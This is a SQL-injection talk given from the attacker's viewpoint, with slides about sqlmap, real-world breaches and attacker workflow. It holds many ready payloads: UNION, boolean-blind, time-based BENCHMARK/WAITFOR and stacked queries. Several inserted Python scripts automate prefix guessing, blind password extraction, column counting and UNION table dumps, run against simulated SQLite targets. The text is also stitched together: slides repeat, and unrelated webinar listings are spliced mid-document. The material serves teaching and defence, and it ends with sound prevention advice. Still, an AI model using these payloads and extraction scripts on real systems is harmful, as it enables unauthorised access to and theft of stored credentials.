It all starts with the '
    (SQL injection from
  attacker's point of view)

     Miroslav Štampar
       (dev@sqlmap.org)
What is SQL injection?



   “SQL injection is an attack in which malicious
 code is inserted into strings that are later passed
  to an instance of DBMS server for parsing and
                     execution”
                    (source: msdn.microsoft.com)




FSec – FOI 2011, Varaždin (Croatia)        September 23, 2011   2
What is SQL injection? (2)
• In plain terms, SQL injection is (mostly) about unauthorized access to DBMS data
• Only in special cases is it about data modification together with system takeover
• "Hello World" vulnerable code example (PHP/MySQL):
     // the raw request parameter becomes part of the statement text
     $sql = "SELECT * FROM table_name WHERE id = " . $_GET["id"];
     $result = mysql_query($sql);




Well known cases
• Between 2005 and 2007 Albert Gonzalez stole 130 million credit card numbers
• June 2007 – Microsoft U.K. website defaced
• December 2009 – RockYou (32 million credentials stolen)
• December 2009 – NASA
• July 2010 – The Pirate Bay




Well known cases (2)
• February 2011 – HBGary (Anonymous)
• March 2011 – MySQL
• March & May 2011 – Comodo (certificate reseller)
• June 2011 – Sony, PBS (@LulzSec)
• August 2011 – Nokia
• September 2011 – NetNames DNS records (Betfair, The Telegraph, The Register, National Geographic, UPS, Vodafone...)


Attackers' motivation


   number of vulnerable sites collected × time spent on each site = const.

   time spent on a particular target / motivation = const.

   (target = one or more (co-hosted) sites)




Attackers' profiles

1) Go after easy targets, unfocused, fast pace, predictable behaviour, loud, don't really care about the target ("script kiddies")
2) Persistent, focused, slow, covert, silent, above-average technical skills, highly motivated (money, extortion, fame) ("black hats"/"crackers"/"bad guys")
3) For fun and knowledge, may warn you about the problem they found, don't want to cause any damage ("gray hats"/"hackers"/"good guys")


SQL injection techniques
• Boolean/Blind – AND 1=1, slow, 1 bit per request, based on page differentiation: a low difference ratio against the original page means a True response, anything else False (in the most common case)
• Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, relies on the subquery result being echoed inside the DBMS error message
• Union/Inband – UNION ALL SELECT NULL,...,(<subquery>),NULL,NULL,..., fastest; in the FULL variant a whole table dump per request, in the PARTIAL variant 1 query result per request
SQL injection techniques (2)
• Time-based – AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0), slowest, 1 bit per request; a measurable delay means a True response, no delay False
• Stacked – ;INSERT INTO users VALUES (10,'test','testpass'), mainly Microsoft SQL Server and PostgreSQL; required for data modification, system access (e.g. xp_cmdshell) and UDF injection; time- and error-based variants exist for data retrieval
• Other (DNS exfiltration, "lateral" injection, second-order attacks, etc.)
Attacking phases
• Most SQL injection attacks can be dissected into the following phases:
    1) Searching for a vulnerable parameter (the "injection point")
    2) Fingerprinting the backend DBMS (to select the proper payloads – e.g. error-based)
    3) Finding the fastest applicable technique (Union > Error > Boolean > Time = Stacked)
    4) Enumeration (retrieving data of interest – e.g. usernames and passwords)
    5) Eventual post-exploitation (underlying OS access, data modification, web server takeover)
Attacking workflow (1)
• Finding a potential target – underground forums (e.g. antichat.ru), IRC channels, Google (e.g. dorks), domain scanning (e.g. nmap -p 80), SHODAN (specialized computer search engine), "drive-by" (e.g. proxying all casual everyday traffic), "hit-lists", etc.
• Manual web-browser based GET/POST parameter tampering with "poisonous" SQL characters (e.g. appending a ' to the end of the original parameter value)


Attacking workflow (2)
• If the response contains a DBMS error, the attacker immediately proceeds with the "proper" (DBMS-dependent) error-based payloads

Attacking workflow (3)
• Otherwise, the next step is to try common boolean-based payloads (e.g. AND 1=1--%20, OR 1=1--%20, etc.)

Attacking workflow (4)
• Along the way, the proper SQL injection prefix/suffix combination has to be "guessed"
• For example, different payloads are needed for
    "SELECT * FROM table_name WHERE id='" . $_GET["id"] . "'"   and
    "SELECT * FROM table_name WHERE id=('" . $_GET["id"] . "')"
• This adds one more dimension to the problem (more combinations to try)
• Most common prefixes are: <blank>, ', ", '), ")
• The suffix problem can most often be sidestepped with the generic comment form: --%20
Attacking workflow (5)
• If boolean/blind injection worked, there is a good chance union/inband works too
• Brute-force search for the proper column count
• ORDER BY n as a fast column-count technique (it errors out once n exceeds the number of columns)
• Checking whether it is a partial or full inband case
• Finding a usable (displayed) column
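Added example (not from the original slides, and not sqlmap's code) that walks the workflow of the last few slides end to end: prefix guessing, the boolean/blind oracle with bit-by-bit extraction, ORDER BY column counting, visible-column detection and a full inband UNION dump. The target web application is simulated in-process with Python and SQLite; its tables, the `('...')` quoting style around the parameter and the credentials are constructed for the example. "Requests" are function calls rather than HTTP, but the payload strings are exactly what would be sent in the GET parameter.

```python
import sqlite3

# Constructed target for this example (not from the original slides): an
# in-memory SQLite database and a page handler that builds its query by
# string concatenation like the slide's PHP example, here with the value
# wrapped in ('...') so the attacker first has to guess the right prefix.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
conn.executemany("INSERT INTO news VALUES (?, ?, ?)",
                 [(1, "Welcome", "first post"), (2, "Release", "v1.0 is out")])
conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'admin', 'P@ssw0rd')")

ERROR_PAGE = "<h1>Error</h1>"
PREFIXES = ["", "'", '"', "')", '")']  # the common prefixes from the slide
SUFFIX = "-- "                          # generic comment suffix (--%20 on the wire)
BASE = "1"                              # a legitimate value of the tested parameter


def page(id_param):
    """The 'web application': renders the matching news item, or a generic
    error page with the DBMS error text suppressed (as a defender would)."""
    sql = "SELECT title, body FROM news WHERE id = ('" + id_param + "')"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return ERROR_PAGE
    return "".join("<h2>%s</h2><p>%s</p>" % row for row in rows) or "<p>No such item</p>"


def find_prefix():
    """Guess the prefix: the right one makes AND 1=1 reproduce the original
    page while AND 1=2 changes it (this is the boolean/blind oracle)."""
    original = page(BASE)
    for prefix in PREFIXES:
        if (page(BASE + prefix + " AND 1=1" + SUFFIX) == original
                and page(BASE + prefix + " AND 1=2" + SUFFIX) != original):
            return prefix
    return None


def oracle(prefix, condition):
    """One boolean/blind request: True iff the page equals the original."""
    return page(BASE + prefix + " AND (" + condition + ")" + SUFFIX) == page(BASE)


def blind_extract(prefix, subquery, max_len=64):
    """Boolean/blind extraction, 1 bit per request: each character of the
    subquery result is found by binary search over its code point (7
    requests per character for 7-bit ASCII)."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            cond = "unicode(substr((%s),%d,1)) >= %d" % (subquery, pos, mid)
            if oracle(prefix, cond):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:  # past the end: substr() gives '' and unicode('') is NULL
            break
        result += chr(lo)
    return result


def find_column_count(prefix, max_cols=20):
    """ORDER BY n fails as soon as n exceeds the column count of the original
    SELECT, so the count falls out of a handful of requests."""
    for n in range(1, max_cols + 1):
        if page(BASE + prefix + " ORDER BY %d" % n + SUFFIX) == ERROR_PAGE:
            return n - 1
    return None


def find_visible_columns(prefix, ncols):
    """UNION in a row of distinct markers (with an id that matches nothing, so
    only the injected row renders) and see which markers are echoed."""
    markers = ["col%d_marker" % i for i in range(1, ncols + 1)]
    payload = "0" + prefix + " UNION ALL SELECT " + ",".join("'%s'" % m for m in markers) + SUFFIX
    html = page(payload)
    return [i + 1 for i, m in enumerate(markers) if m in html]


def union_dump(prefix, ncols, columns, table):
    """FULL inband: the whole table comes back in one request, padded with
    NULLs up to the original column count."""
    select_list = columns + ["NULL"] * (ncols - len(columns))
    payload = "0" + prefix + " UNION ALL SELECT " + ",".join(select_list) + " FROM " + table + SUFFIX
    return page(payload)


if __name__ == "__main__":
    p = find_prefix()
    n = find_column_count(p)
    print("prefix %r, %d columns, visible %r" % (p, n, find_visible_columns(p, n)))
    print("blind:", blind_extract(p, "SELECT password FROM users WHERE id=1"))
    print("union:", union_dump(p, n, ["name", "password"], "users"))
```

Two things worth noticing when running it: the blind path needs about 7 requests per character and only ever learns one bit per page comparison, while the UNION path returns the whole `users` table in a single response, which is why the slides rank union first and blind/time-based last. The `unicode()`/`substr()` pair is SQLite's spelling; on MySQL the same role is played by `ASCII(SUBSTRING(...))`, and the prefix list is the one from the previous slide.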




Attacking workflow (6)
• If everything else fails the attacker can proceed (high motivation required) with common time-based payloads and/or stacked queries
• Most commonly this happens with INSERT/UPDATE/DELETE injection cases (and with DBMS error messages suppressed)
• Common payloads are: AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(97))),0), ;IF(2>1) WAITFOR DELAY '0:0:5', ;SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000), etc.



Attacking workflow (7)
• The enumeration phase consists of retrieving ("stealing") data of interest:
    - Database and table names
    - Table dumps (e.g. users, admin, ...)
    - System-stored usernames and password hashes
    - User privileges and roles
• Highly DBMS dependent (system database and table names, common function names, etc.)
• Automated tools are highly preferable for the boolean/blind and time-based techniques

Attacking workflow (8)
• Eventual post-exploitation is bounded by the applicable SQL injection technique(s) and the current user's privileges
• The best (for the attacker) / worst (for the defender) case is the stacked technique combined with "admin" privileges
• UDF injection (e.g. functions for OS command execution), web shell (e.g. union/inband MySQL INTO OUTFILE), Metasploit payload upload and execution (e.g. stacked Microsoft SQL xp_cmdshell), etc.

Process automation

1) Web Application Assessment Proxy (optional) –
  BURP, WebScarab
2) Automatic SQL injection detection and
  exploitation tool – sqlmap, Havij, sqlninja
3) Second order exploitation framework –
  Metasploit (optional)




Introducing sqlmap
• "sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server(s)"
• Unofficially, sqlmap is an AIO (All-In-One) SQL injection tool
• Over 10,000 repository updates and/or checkouts on a monthly basis
• Part of the most popular security distributions: Backtrack, Backbox, Web Security Dojo, OWASP Web Testing, ...

sqlmap capabilities
• Fully supported backend DBMSes (and growing): MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB
• Fully supported SQL injection techniques: Boolean/Blind, Error-based, Union/Inband (partial & full), Time-based, Stacked
• Enumeration of: database users, users' password hashes, users' privileges, users' roles, databases, tables and columns, etc.


sqlmap capabilities (2)
• Automatic recognition and cracking of password hashes
• Support for IDS/WAF evasion in the form of "tamper" scripts
• Web server file upload/download
• Arbitrary OS command execution and retrieval of standard console output
• Establishment of an out-of-band TCP/UDP connection between the attacker's machine and the database server (Metasploit, ICMPsh)

Closing words (for attackers)
• Learn SQL more than "well" – "SQL injection is 100% SQL. The rest is injection"
• Set up a (virtual) vulnerable environment entirely by yourself – for a better mindset and for owning a LEGAL assessment testing machine
• Reproduce, with understanding, what other "attackers" do – including automated tools (e.g. sqlmap)
• Research defensive mechanisms – for an advanced comprehension of the topic


Closing words (for defenders)
• Use (only) prepared SQL statements (bullet-proof against SQL injection through parameter values; identifiers such as table names or ORDER BY columns cannot be bound and still need a whitelist)
• Home-grown filtering is prone to common "programmer's" mistakes (e.g. forgetting to hard type-cast an integer parameter value)
• Turn off DBMS error reporting to the client
• Run with least privilege (a non-admin "query" user)
• Always expect the worst-case scenario and set up accordingly (e.g. use the GRANT/REVOKE mechanism deliberately)
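Added example (not from the original slides, and not sqlmap code) putting the "Hello World" vulnerable pattern from the introduction beside the two fixes recommended here: a prepared statement, and a hard type-cast in front of it. It is written in Python against an in-memory SQLite database rather than PHP/MySQL so it runs offline; the table, columns and rows are constructed for the example.

```python
import sqlite3

# Constructed sample data for this example (not from the original slides).
ROWS = [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "letmein")]


def make_db():
    """In-memory SQLite stand-in for the MySQL backend on the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, user_id):
    """Same construction as the PHP 'Hello World' example earlier on the page:
    the raw request parameter is pasted into the statement text, so SQL in
    the parameter becomes SQL in the query (kept deliberately vulnerable)."""
    sql = "SELECT id, name FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def prepared_lookup(conn, user_id):
    """Prepared statement: the value is bound as a parameter and never becomes
    statement text, so '1 OR 1=1' is just a string that matches no integer id."""
    sql = "SELECT id, name FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def typed_lookup(conn, user_id):
    """Defence in depth: hard type-cast the parameter before it reaches the
    query. Skipping this cast is the 'programmer's mistake' the slide warns
    about in home-grown filtering."""
    try:
        numeric_id = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    return prepared_lookup(conn, numeric_id)
```

With `id=1 OR 1=1` the vulnerable function returns every row and `id=-1 UNION SELECT name, password FROM users` returns the credentials, while the prepared statement returns nothing for the same input and the typed variant rejects it before any query is built.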
Questions?
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusZilliz
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 

Último (20)

Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 

It all starts with the ' (SQL injection from attacker's point of view)

• 1. It all starts with the ' (SQL injection from attacker's point of view)
  Miroslav Štampar (dev@sqlmap.org)

• 2. What is SQL injection?
  "SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution" (source: msdn.microsoft.com)
  FSec – FOI 2011, Varaždin (Croatia), September 23, 2011

• 3. What is SQL injection? (2)
  - In plain speak, SQL injection is (mostly) about unauthorized DBMS data access
  - Only in special cases is it about data modification together with system takeover
  - "Hello World" vulnerable code example (PHP/MySQL):
      $sql = "SELECT * FROM table_name WHERE id = " . $_GET["id"];
      $result = mysql_query($sql);

• 4. Well known cases
  - Between 2005 and 2007 Albert Gonzalez stole 130 million credit card numbers
  - June 2007 – Microsoft U.K. website defaced
  - December 2009 – RockYou (32 million credentials stolen)
  - December 2009 – NASA
  - July 2010 – The Pirate Bay

• 5. Well known cases (2)
  - February 2011 – HBGary (Anonymous)
  - March 2011 – MySQL
  - March & May 2011 – Comodo (certificate reseller)
  - June 2011 – Sony, PBS (@LulzSec)
  - August 2011 – Nokia
  - September 2011 – NetNames DNS records (Betfair, The Telegraph, The Register, The National Geographic, UPS, Vodafone...)

• 6. Attackers' motivation
  number of vulnerable sites collected x time spent on each site = const.
  time spent on particular target / motivation = const.
  (target = multiple (co)sites)

• 7. Attackers' profiles
  1) Targeting easy targets, unfocused, fast pace, predictable behavior, blabbering, don't really care about the target ("script kiddies")
  2) Persistent, focused, slow motion, covert, silent, higher than average technical skills, highly motivated (money, extortion, fame) ("black hats"/"crackers"/"bad guys")
  3) For fun and knowledge, could warn you about the problem found, don't want to cause any damage ("gray hats"/"hackers"/"good guys")

• 8. SQL injection techniques
  - Boolean/blind: AND 1=1; slow, 1 bit per request; based on page differentiation: a low difference ratio against the original page means a True response, otherwise False (in most common cases)
  - Error-based: CONVERT(INT,(<subquery>)); fast, one (sub)query result per request; based on the inclusion of the subquery result(s) inside the DBMS error message
  - Union/inband: UNION ALL SELECT NULL,...,(<subquery>),NULL,NULL,...; fastest; in the FULL variant a whole table dump per request, in the PARTIAL variant one query result per request

• 9. SQL injection techniques (2)
  - Time-based: AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0); slowest, 1 bit per request; a delay means a True response, otherwise False
  - Stacked: ;INSERT INTO users VALUES (10, 'test', 'testpass'); affecting mainly Microsoft SQL Server and PostgreSQL platforms (availability also depends on the client API allowing multiple statements per call); required for data modification, system access (e.g. xp_cmdshell) and UDF injection; there are also time- and error-based variants for data retrieval
  - Other (DNS exfiltration, "lateral", second-order attacks, etc.)

• 10. Attacking phases
  Most SQL injection attacks can be dissected into the following phases:
  1) Searching for a vulnerable parameter (aka "injection point")
  2) Fingerprinting the backend DBMS (for usage of proper payloads, e.g. error-based)
  3) Finding the fastest applicable technique (U > E > B > T = S)
  4) Enumeration (retrieving data of interest, e.g. usernames and passwords)
  5) Eventual post-exploitation (underlying OS access, data modification, web server takeover)

• 11. Attacking workflow (1)
  - Finding a potential target: underground forums (e.g. antichat.ru), IRC channels, Google (e.g. dorks), domain scanning (e.g. nmap -p 80), SHODAN (specialized computer search engine), "drive-by" (e.g. proxying of all casual everyday traffic), "hit-list", etc.
  - Manual web-browser based GET/POST parameter tampering with "poisonous" SQL characters (e.g. appending the character ' to the end of the original parameter value)

• 12. Attacking workflow (2)
  - If the response contains a DBMS error, the attacker immediately proceeds with the "proper" (DBMS-dependent) error-based payloads

• 13. Attacking workflow (3)
  - Otherwise, the following step is the usage of common boolean-based payloads (e.g. AND 1=1--%20, OR 1=1--%20, etc.)

• 14. Attacking workflow (4)
  - Along the attacking line, the proper SQL injection prefix/suffix combination has to be "guessed"
  - For example, different payloads are needed in these two cases:
      "SELECT * FROM table_name WHERE id='" . $_GET["id"] . "'"
      "SELECT * FROM table_name WHERE id=('" . $_GET["id"] . "')"
  - Adds one more dimension to the problem (more combinations)
  - Most common prefixes are: <blank>, ', ", '), ")
  - The problem of suffix finding can most often be circumvented by the usage of the generic comment form: --%20
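The boolean/blind workflow of slides 8, 13 and 14 (guess the prefix/suffix boundary with AND 1=1 / AND 1=2, then pull data one yes/no question per request) as an added example in Python. This is not code from the slides or from sqlmap. The target is a constructed in-memory SQLite database behind a hypothetical vulnerable page (`vulnerable_page`) whose parameter lands inside `id=('...')` with DBMS errors suppressed; SQLite's `LENGTH`, `SUBSTR` and `UNICODE` stand in for the DBMS-specific functions a real target would need.

```python
import sqlite3

# Constructed sample data standing in for the target's DBMS (not real data).
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE users (id INTEGER, name TEXT, pass TEXT)")
con.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")

requests_sent = 0  # in blind mode every request yields one bit of information


def vulnerable_page(id_param: str) -> str:
    """Simulated target (hypothetical): the parameter is concatenated inside
    id=('...'), DBMS errors are swallowed, and the only observable difference
    is whether a row came back (page differentiation)."""
    global requests_sent
    requests_sent += 1
    sql = "SELECT name FROM users WHERE id=('" + id_param + "')"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        rows = []
    return "<h1>User: %s</h1>" % rows[0][0] if rows else "<h1>No such user</h1>"


PREFIXES = ["", "'", '"', "')", '")']   # the common prefixes listed on slide 14
SUFFIX = "-- "                          # generic comment swallows the rest of the query


def find_boundary(original: str = "1"):
    """Guess the prefix/suffix pair: it is right when 'AND 1=1' reproduces the
    original page and 'AND 1=2' does not (the slide 13 boolean check)."""
    true_page = vulnerable_page(original)
    for prefix in PREFIXES:
        same = vulnerable_page(f"{original}{prefix} AND 1=1{SUFFIX}") == true_page
        different = vulnerable_page(f"{original}{prefix} AND 1=2{SUFFIX}") != true_page
        if same and different:
            return prefix, SUFFIX
    return None


def blind_extract(subquery: str, boundary, max_len: int = 64) -> str:
    """Boolean/blind retrieval: binary search on LENGTH, then on the code point
    of each character, so every character costs about seven requests."""
    prefix, suffix = boundary
    true_page = vulnerable_page("1")

    def ask(condition: str) -> bool:
        return vulnerable_page(f"1{prefix} AND {condition}{suffix}") == true_page

    def search(expr: str, lo: int, hi: int) -> int:
        # smallest v in [lo, hi] for which NOT (expr > v), i.e. the value of expr
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = search(f"LENGTH(({subquery}))", 0, max_len)
    return "".join(
        chr(search(f"UNICODE(SUBSTR(({subquery}),{pos},1))", 32, 126))
        for pos in range(1, length + 1)
    )


def steal_admin_password():
    """Full run: boundary detection, then blind extraction of one secret.
    Returns the recovered value and the number of requests it cost."""
    global requests_sent
    requests_sent = 0
    boundary = find_boundary()
    secret = blind_extract("SELECT pass FROM users WHERE name='admin'", boundary)
    return secret, requests_sent


if __name__ == "__main__":
    print(steal_admin_password())
```

Only the `')` prefix survives the 1=1 / 1=2 test here: with no prefix the whole payload is a string literal, with `'` the parenthesis stays open and the DBMS errors out, which the page hides as "No such user". The request counter is the point of the exercise: a six-character value costs around fifty requests, which is why slide 17 says automation is all but mandatory for the blind and time-based techniques.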
• 15. Attacking workflow (5)
  - In case that boolean/blind injection worked, there is a great possibility for union/inband
  - Brute-force search for the proper column number
  - ORDER BY as a fast column number finding technique
  - Checking whether it is a partial or full inband case
  - Finding a usable (displayed) column
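The union/inband steps of slide 15 (ORDER BY to count columns, a marker in each UNION slot to find the displayed ones, then the FULL variant of slide 8 pulling a whole table in one request) as an added example in Python; this is not code from the slides or from sqlmap. The target is again a constructed in-memory SQLite database behind a hypothetical page (`vulnerable_page`) that selects four columns but renders only two and answers DBMS errors with a generic error page.

```python
import re
import sqlite3

# Constructed sample data standing in for the target's DBMS (not real data).
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL, sku TEXT)")
con.execute("INSERT INTO products VALUES (1, 'widget', 9.99, 'W-1')")
con.execute("CREATE TABLE users (id INTEGER, name TEXT, pass TEXT)")
con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                [(1, "admin", "s3cret"), (2, "bob", "hunter2")])


def vulnerable_page(id_param: str) -> str:
    """Simulated target (hypothetical): four columns are selected but only name
    and price are rendered; any DBMS error becomes a generic error page."""
    sql = "SELECT id, name, price, sku FROM products WHERE id = " + id_param
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        return "<p>Internal error</p>"
    return "".join(f"<li>{name} costs {price}</li>" for _, name, price, _ in rows)


def count_columns(max_cols: int = 32):
    """ORDER BY n is valid up to the column count and an error beyond it, so
    the first n that changes the page gives the count as n-1."""
    normal = vulnerable_page("1")
    for n in range(1, max_cols + 2):
        if vulnerable_page(f"1 ORDER BY {n}") != normal:
            return n - 1
    return None


def find_visible_columns(ncols: int):
    """Put a marker into each UNION slot in turn; the slots whose marker shows
    up in the page are the usable (displayed) columns."""
    visible = []
    for pos in range(1, ncols + 1):
        slots = ["NULL"] * ncols
        slots[pos - 1] = "'sqlmapMARKER'"
        if "sqlmapMARKER" in vulnerable_page("-1 UNION ALL SELECT " + ",".join(slots)):
            visible.append(pos)
    return visible


def union_dump(subquery: str, ncols: int, column: int) -> str:
    """Inband retrieval: the subquery result comes back inside the normal page,
    wrapped in delimiters so it can be cut out reliably."""
    slots = ["NULL"] * ncols
    slots[column - 1] = f"'<<'||({subquery})||'>>'"
    page = vulnerable_page("-1 UNION ALL SELECT " + ",".join(slots))
    match = re.search(r"<<(.*?)>>", page, re.S)
    return match.group(1) if match else ""


def dump_users() -> str:
    """The whole slide 15 sequence, ending with a FULL-variant table dump:
    every users row concatenated into a single value in one request."""
    ncols = count_columns()
    column = find_visible_columns(ncols)[0]
    return union_dump("SELECT GROUP_CONCAT(name||':'||pass, ',') FROM users", ncols, column)


if __name__ == "__main__":
    print(count_columns(), find_visible_columns(count_columns()))
    print(dump_users())
```

The original row is suppressed with `id = -1` so that only the UNIONed row is rendered. This page prints every row it gets, which is the FULL case; on a page that shows a single row (PARTIAL case) the same `union_dump` would be called once per row with `LIMIT 1 OFFSET n` in the subquery.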
• 16. Attacking workflow (6)
  - If everything else fails, the attacker could proceed (high motivation required) with common time-based payloads and/or stacked queries
  - Most commonly this happens in INSERT/UPDATE/DELETE SQL injection cases (where DBMS error messages are suppressed)
